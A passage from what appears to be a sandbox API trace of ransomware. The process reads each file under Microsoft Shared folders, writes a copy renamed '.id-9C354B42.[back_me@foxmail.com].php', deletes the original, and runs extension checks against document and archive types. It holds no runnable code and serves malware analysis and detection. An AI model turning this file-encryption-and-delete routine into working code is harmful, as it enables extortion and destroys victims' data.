"c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.020] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0043.020] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.020] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.020] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0043.020] GetLastError () returned 0x0 [0043.020] ReadFile (in: hFile=0x204, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0xa7f, lpOverlapped=0x0) returned 1 [0043.755] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xa80, lpOverlapped=0x0) returned 1 [0043.757] ReadFile (in: hFile=0x204, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.757] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0043.757] SetEndOfFile (hFile=0x210) returned 1 [0043.757] CloseHandle (hObject=0x210) returned 1 [0043.758] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.758] SetEndOfFile (hFile=0x204) returned 1 [0043.759] CloseHandle (hObject=0x204) returned 1 [0043.759] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0043.760] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml")) returned 1 [0043.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0043.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0043.760] lstrlenW (lpString=".doc") returned 4 [0043.760] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0043.760] lstrlenW (lpString=".docx") returned 5 [0043.760] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0043.760] lstrlenW (lpString=".pdf") returned 4 [0043.761] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0043.761] lstrlenW (lpString=".xls") returned 4 [0043.761] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0043.761] lstrlenW (lpString=".xlsx") returned 5 [0043.761] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0043.761] lstrlenW (lpString=".ppt") returned 4 [0043.761] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0043.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0043.761] lstrlenW (lpString=".zip") returned 4 [0043.761] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0043.761] lstrlenW (lpString=".rar") returned 4 [0043.761] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0043.761] lstrlenW (lpString=".bz2") returned 4 [0043.761] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0043.761] lstrlenW (lpString=".7z") returned 3 [0043.761] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0043.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0043.761] lstrlenW (lpString=".dbf") returned 4 [0043.761] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0043.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0043.761] lstrlenW (lpString=".1cd") returned 4 [0043.761] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0043.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0043.761] lstrlenW (lpString=".jpg") returned 4 [0043.761] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0043.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0043.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0043.761] lstrlenW (lpString=".doc") returned 4 [0043.761] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0043.761] lstrlenW (lpString=".docx") returned 5 [0043.761] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0043.761] lstrlenW (lpString=".pdf") returned 4 [0043.761] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0043.762] lstrlenW (lpString=".xls") returned 4 [0043.762] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0043.762] lstrlenW (lpString=".xlsx") returned 5 [0043.762] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0043.762] lstrlenW (lpString=".ppt") returned 4 [0043.762] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0043.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0043.762] lstrlenW (lpString=".zip") returned 4 [0043.762] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0043.762] lstrlenW (lpString=".rar") returned 4 [0043.762] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0043.762] lstrlenW (lpString=".bz2") returned 4 [0043.762] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0043.762] lstrlenW (lpString=".7z") returned 3 [0043.762] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0043.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0043.762] lstrlenW (lpString=".dbf") returned 4 [0043.762] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0043.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0043.762] lstrlenW (lpString=".1cd") returned 4 [0043.762] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0043.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0043.762] lstrlenW (lpString=".jpg") returned 4 [0043.762] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0043.762] lstrcmpiW (lpString1=".htm", lpString2=".php") returned -1 [0043.762] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0043.762] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.073] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=237) returned 1 [0046.116] CloseHandle (hObject=0x1fc) returned 1 [0046.116] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm")) returned 0x20 [0046.116] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.116] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0046.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0046.116] lstrlenW (lpString=".doc") returned 4 [0046.116] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0046.116] lstrlenW (lpString=".docx") returned 5 [0046.116] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0046.116] lstrlenW (lpString=".pdf") returned 4 [0046.116] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0046.116] lstrlenW (lpString=".xls") returned 4 [0046.116] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0046.116] lstrlenW (lpString=".xlsx") returned 5 [0046.116] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0046.116] lstrlenW (lpString=".ppt") returned 4 [0046.116] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0046.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0046.116] lstrlenW (lpString=".zip") returned 4 [0046.116] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0046.116] lstrlenW (lpString=".rar") returned 4 [0046.117] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0046.117] lstrlenW (lpString=".bz2") returned 4 [0046.117] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0046.117] lstrlenW (lpString=".7z") returned 3 [0046.117] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0046.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0046.117] lstrlenW (lpString=".dbf") returned 4 [0046.117] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0046.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0046.117] lstrlenW (lpString=".1cd") returned 4 [0046.117] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0046.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0046.117] lstrlenW (lpString=".jpg") returned 4 [0046.117] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0046.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0046.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0046.117] lstrlenW (lpString=".doc") returned 4 [0046.117] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0046.117] lstrlenW (lpString=".docx") returned 5 [0046.117] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0046.117] lstrlenW (lpString=".pdf") returned 4 [0046.117] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0046.117] lstrlenW (lpString=".xls") returned 4 [0046.117] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0046.117] lstrlenW (lpString=".xlsx") returned 5 [0046.117] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0046.117] lstrlenW (lpString=".ppt") returned 4 [0046.117] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0046.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0046.117] lstrlenW (lpString=".zip") returned 4 [0046.117] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0046.117] lstrlenW (lpString=".rar") returned 4 [0046.117] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0046.117] lstrlenW (lpString=".bz2") returned 4 [0046.117] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0046.118] lstrlenW (lpString=".7z") returned 3 [0046.118] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0046.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0046.118] lstrlenW (lpString=".dbf") returned 4 [0046.118] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0046.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0046.118] lstrlenW (lpString=".1cd") returned 4 [0046.118] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0046.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0046.118] lstrlenW (lpString=".jpg") returned 4 [0046.118] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0046.118] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0046.118] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.118] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.362] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=34916) returned 1 [0046.363] CloseHandle (hObject=0x184) returned 1 [0046.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png")) returned 0x20 [0046.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.380] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.380] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.380] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.380] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0046.381] GetLastError () returned 0x0 [0046.381] ReadFile (in: hFile=0x184, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x8864, lpOverlapped=0x0) returned 1 [0046.383] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x8870, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x8870, lpOverlapped=0x0) returned 1 [0046.384] ReadFile (in: hFile=0x184, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.384] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.384] SetEndOfFile (hFile=0x1b4) returned 1 [0046.384] CloseHandle (hObject=0x1b4) returned 1 [0046.384] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.385] SetEndOfFile (hFile=0x184) returned 1 [0046.385] CloseHandle (hObject=0x184) returned 1 [0046.385] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.386] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png")) returned 1 [0046.386] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0046.386] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0046.386] lstrlenW (lpString=".doc") returned 4 [0046.386] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.386] lstrlenW (lpString=".docx") returned 5 [0046.386] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.386] lstrlenW (lpString=".pdf") returned 4 [0046.386] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.386] lstrlenW (lpString=".xls") returned 4 [0046.386] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.386] lstrlenW (lpString=".xlsx") returned 5 [0046.386] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.386] lstrlenW (lpString=".ppt") returned 4 [0046.386] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.386] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0046.386] lstrlenW (lpString=".zip") returned 4 [0046.386] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.386] lstrlenW (lpString=".rar") returned 4 [0046.386] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.386] lstrlenW (lpString=".bz2") returned 4 [0046.386] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.386] lstrlenW (lpString=".7z") returned 3 [0046.387] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0046.387] lstrlenW (lpString=".dbf") returned 4 [0046.387] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0046.387] lstrlenW (lpString=".1cd") returned 4 [0046.387] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0046.387] lstrlenW (lpString=".jpg") returned 4 [0046.387] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0046.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0046.387] lstrlenW (lpString=".doc") returned 4 [0046.387] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.387] lstrlenW (lpString=".docx") returned 5 [0046.387] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.387] lstrlenW (lpString=".pdf") returned 4 [0046.387] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.387] lstrlenW (lpString=".xls") returned 4 [0046.387] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.387] lstrlenW (lpString=".xlsx") returned 5 [0046.387] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.387] lstrlenW (lpString=".ppt") returned 4 [0046.387] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0046.387] lstrlenW (lpString=".zip") returned 4 [0046.387] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.387] lstrlenW (lpString=".rar") returned 4 [0046.387] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.387] lstrlenW (lpString=".bz2") returned 4 [0046.387] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.387] lstrlenW (lpString=".7z") returned 3 [0046.387] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0046.388] lstrlenW (lpString=".dbf") returned 4 [0046.388] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0046.388] lstrlenW (lpString=".1cd") returned 4 [0046.388] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0046.388] lstrlenW (lpString=".jpg") returned 4 [0046.388] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.388] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0046.388] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.388] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.388] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=3479) returned 1 [0046.388] CloseHandle (hObject=0x184) returned 1 [0046.388] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif")) returned 0x20 [0046.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.389] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.389] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.389] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.389] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0046.395] GetLastError () returned 0x0 [0046.395] ReadFile (in: hFile=0x184, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0xd97, lpOverlapped=0x0) returned 1 [0046.396] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xda0, lpOverlapped=0x0) returned 1 [0046.397] ReadFile (in: hFile=0x184, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.397] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.397] SetEndOfFile (hFile=0x1b4) returned 1 [0046.398] CloseHandle (hObject=0x1b4) returned 1 [0046.398] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.398] SetEndOfFile (hFile=0x184) returned 1 [0046.398] CloseHandle (hObject=0x184) returned 1 [0046.399] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.399] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: 